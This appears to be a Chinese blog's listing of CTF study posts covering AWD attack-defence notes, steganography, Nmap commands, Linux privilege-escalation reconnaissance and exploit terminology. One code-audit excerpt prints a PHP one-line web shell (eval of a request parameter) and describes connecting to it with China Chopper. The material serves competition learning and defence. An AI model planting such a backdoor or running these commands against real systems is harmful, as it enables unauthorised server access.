CTF
普通Gopher
大数据非入门者,云计算菜鸡
网络安全混子,机器学习渣渣
开发不会,运维太累
展开
-
ctf线下AWD攻防赛学习笔记
ctf线下AWD攻防赛学习笔记CTF线下攻防赛主要以攻防模式(Attack & Defense)来呈现。一般在这种模式下,一支参赛队伍有三名队员,所有的参赛队伍都会有同样的初始环境,包含若干台服务器。参赛队伍挖掘漏洞,通过攻击对手的服务器获取Flag来得分,以修补自身服务器的漏洞防止扣分。在这种赛制中,不仅仅是比参赛队员的智力和技术,同时也比团队之间的分工配合与合作。题目类型语...原创 2019-10-20 20:45:27 · 9852 阅读 · 0 评论 -
CTF线下AWD攻防步骤总结
AWD竞赛前半个小时应熟悉配置环境。准备网线、网线转接口最好的防御就是攻击,一定要做好安全加固本次记录的目的是为了给自己一个月来的准备弄个交代,感觉自己跟大佬们差的很远,只拿了三等,往后的路还很长,还是需要亿点点的努力,无限进步.赛前准备常用工具:Burpsuitesqlmapnmap、masscanncD盾Xshell、Xftp菜刀或蚁剑Chrome、Firefox...原创 2019-10-20 20:44:40 · 21554 阅读 · 6 评论 -
CTF隐写总结
打了有小半年ctf比赛了,一直没有时间来写几篇关于ctf的博客,今天抽出时间写了点杂项中隐写的总结,希望能够帮到大家简述隐写术是一门关于信息隐藏的技巧与科学,所谓信息隐藏指的是不让除预期的接收者之外的任何人知晓信息的传递事件或者信息的内容。隐写术的英文叫做Steganography,来源于特里特米乌斯的一本讲述密码学与隐写术的著作Steganographia,该书书名源于希腊语,意为“隐秘书写...原创 2019-09-30 19:53:49 · 3084 阅读 · 0 评论 -
Nmap工具命令详解
nmap用于网络扫描和主机检测 漏洞探测 安全扫描发现主机nmap -sP 10.0.3.0/24 发现有哪些机器,主机,路由器,交换机,跳过端口检测nmap -sn 10.0.1.161-166 ping探测扫描主机,不进行端口扫描nmap 10.0.1.161 -sA (发送tcp的ack包进行探测,可以探测主机是否存活)nmap 192.168.1.1-100 (扫描...原创 2019-10-02 19:28:54 · 554 阅读 · 0 评论 -
PHP代码审计工具Rips的使用
Rips0x00 介绍最近在准备CTF攻防比赛时发现了一个很好的代码审计工具,接下来就给大家介绍此工具的使用在安全工作中,代码审计是很重要的一项技能。在面对大规模的代码时,使用自动化工具辅助人工漏洞挖掘,可以显著提高审计工作的效率。学会利用自动化代码审计工具,是每一个代码审计人员必备的能力。它使用了静态分析技术,能够自动化地挖掘PHP源代码潜在的安全漏洞如XSS ,sql注入,敏感信息...原创 2019-10-02 19:29:23 · 5256 阅读 · 1 评论 -
Liunx提权常用命令
操作系统信息收集如何查看服务器的版本cat /etc/issuecat /etc/*-releasecat /etc/lsb-release # 基于 Debiancat /etc/redhat-release # 基于 Redhat如何查看内核的版本信息?cat /proc/versionuname -auname -mrsrpm -q kerneldmes...转载 2019-10-05 11:38:16 · 265 阅读 · 0 评论 -
网络安全 payload、shellcode、exp、poc 详解
在学习网络安全的过程中经常会听到几个名词,例如payload、shellcode、exp、poc等碰见不懂的东西就要去搞懂,于是动手查了查资料Payload是什么?是包含在你用于一次漏洞利用(exploit)中的ShellCode中的主要功能代码对于一个漏洞,他可以被利用(exploit),利用有一个完整的解决方案你可以把这个看作是名词的(exploit),然后利用必然有目的,而你的目的...原创 2019-10-06 13:40:35 · 17569 阅读 · 2 评论 -
CTF AWD模式下简单的CMS代码审计
今天先把去年的AWD代码审计一下,以后有时间就把今年的AWD代码审计写一下index.php<?php include 'header.php';@eval($_REQUEST['aa']);echo 'eval';?>首先打开index.php,一目了然,可以看到头文件有一句话木马,密码是aa这里使用中国菜刀可以直接连上一句话木马,进入服务器扩展了解一句话脚本...原创 2019-10-08 20:26:14 · 3224 阅读 · 0 评论